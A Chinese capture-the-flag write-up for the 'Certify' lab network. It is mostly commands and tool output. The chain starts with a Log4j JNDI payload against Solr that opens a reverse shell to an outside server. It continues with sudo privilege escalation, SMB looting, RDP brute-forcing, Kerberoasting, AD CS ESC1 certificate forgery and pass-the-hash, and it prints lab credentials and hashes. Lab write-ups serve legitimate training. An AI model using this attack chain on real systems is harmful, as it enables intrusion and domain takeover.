本文主要是介绍春秋云境Certify-WP【一遍过】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
flag01
fscan扫描
扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件
触发点是action参数
/solr/admin/collections?action=验证:
http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://iszpua.dnslog.cn}我是这样的,不知道为什么
其他人是这样的
证明存在log4j漏洞,利用JNDIExploit工具打
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i vps -p 8888
监听端口
nc -lvnp 9999访问网站
http://39.xx.xx.xx:8983/solr/admin/collections?action=${jndi:ldap://175.xx.xx.xx:1389/Basic/ReverseShell/175.xx.xx.xx/9999}获得shell
提权
sudo -l
发现grc可以免密sudo执行,查看提权手册
sudo /usr/bin/grc --pty /bin/sh获得权限
在/root/flag/flag01.txt获得flag01
flag02
先用wget上传frp和fscan
信息收集:
start infoscan
(icmp) Target 172.22.9.7 is alive
(icmp) Target 172.22.9.19 is alive
(icmp) Target 172.22.9.47 is alive
(icmp) Target 172.22.9.26 is alive
[*] Icmp alive hosts len is: 4
172.22.9.47:80 open
172.22.9.7:80 open
172.22.9.19:80 open
172.22.9.47:22 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.7:135 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:445 open
172.22.9.26:139 open
172.22.9.7:139 open
172.22.9.47:139 open
172.22.9.7:88 open
172.22.9.26:135 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.9.7[->]XIAORANG-DC[->]172.22.9.7
[*] WebTitle: http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] NetBios: 172.22.9.7 [+]DC XIAORANG\XIAORANG-DC
[*] 172.22.9.47 (Windows 6.1)
[*] NetInfo:
[*]172.22.9.26[->]DESKTOP-CBKTVMO[->]172.22.9.26
[*] WebTitle: http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetBios: 172.22.9.47 fileserver Windows 6.1
[*] WebTitle: http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[+] http://172.22.9.7 poc-yaml-active-directory-certsrv-detect总结出下面的拓扑
172.22.9.7 DC域控
172.22.9.13 CA域内机器
172.22.9.19 当前机器
172.22.9.26 域内机器
172.22.9.47 文件服务器开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接
proxychains smbclient -L 172.22.9.47
查看共享文件
proxychains smbclient //172.22.9.47/fileshare
找到flag02.txt,直接get下来查看
flag03
把之前的数据库也get下来
打开查看,可以看到user表和member表
这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)
导出数据,编为字典user.txt和pass.txt,爆破
proxychains hydra -L user.txt -P pass.txt 172.22.9.26 rdp没有爆成功。。
看wp得到两个账号
XIAORANG.LAB\zhangjian–i9XDE02pLVf
XIAORANG.LAB\zhangjian–fiAzGwEMgTY远程连接失败
根据flag02的提示,要用到spn
这里先尝试查找下域用户下的spn
proxychains impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
把凭证保存在hash.txt中,尝试hashcat破解
看了下hash类型(hashcat -h),符合13100
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
得到这样一个账户(另一个账户也是可以的)
XIAORANG.LAB\zhangxia
MyPass2@@6再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处
这时重新看看内网还有那些机器
172.22.9.13 CA域成员机
存在一台证书颁发服务器
域渗透中和证书服务器相关的利用有ESC1和ESC8
先利用Certipy工具查看证书情况
proxychains certipy find -u 'zhangxia@xiaorang.lab' -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdoutCertificate Authorities0CA Name : xiaorang-XIAORANG-DC-CADNS Name : XIAORANG-DC.xiaorang.labCertificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=labCertificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5Certificate Validity Start : 2023-07-14 04:33:21+00:00Certificate Validity End : 2028-07-14 04:43:21+00:00Web Enrollment : DisabledUser Specified SAN : UnknownRequest Disposition : UnknownEnforce Encryption for Requests : Unknown
Certificate Templates0Template Name : XR ManagerDisplay Name : XR ManagerCertificate Authorities : xiaorang-XIAORANG-DC-CAEnabled : TrueClient Authentication : TrueEnrollment Agent : FalseAny Purpose : FalseEnrollee Supplies Subject : TrueCertificate Name Flag : EnrolleeSuppliesSubjectEnrollment Flag : PublishToDsIncludeSymmetricAlgorithmsPrivate Key Flag : ExportableKeyExtended Key Usage : Encrypting File SystemSecure EmailClient AuthenticationRequires Manager Approval : FalseRequires Key Archival : FalseAuthorized Signatures Required : 0Validity Period : 1 yearRenewal Period : 6 weeksMinimum RSA Key Length : 2048PermissionsEnrollment PermissionsEnrollment Rights : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Domain UsersXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\Authenticated UsersObject Control PermissionsOwner : XIAORANG.LAB\AdministratorWrite Owner Principals : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\AdministratorWrite Dacl Principals : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\AdministratorWrite Property Principals : XIAORANG.LAB\Domain AdminsXIAORANG.LAB\Enterprise AdminsXIAORANG.LAB\Administrator[!] VulnerabilitiesESC1 : 'XIAORANG.LAB\\Domain Users' and 'XIAORANG.LAB\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication虽然默认也有 ESC8, 但是因为 AD DS 和 AD CS 是在同一台机器上的, 所以无法进行 NTLM Relay
下面利用 ESC1
申请 XR Manager 证书模版并伪造域管理员,得到administrator.pfx
proxychains certipy req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'
利用administrator.pfx证书获取 TGT 和 NTLM Hash
proxychains certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7
NTLM:2f1b57eefb2d152196836b0516abea80获得flag
proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
flag04
最后获得域控的flag04
proxychains crackmapexec smb 172.22.9.7 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
或者
proxychains impacket-wmiexec -hashes :2f1b57eefb2d152196836b0516abea80 Administrator@172.22.9.7
这篇关于春秋云境Certify-WP【一遍过】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
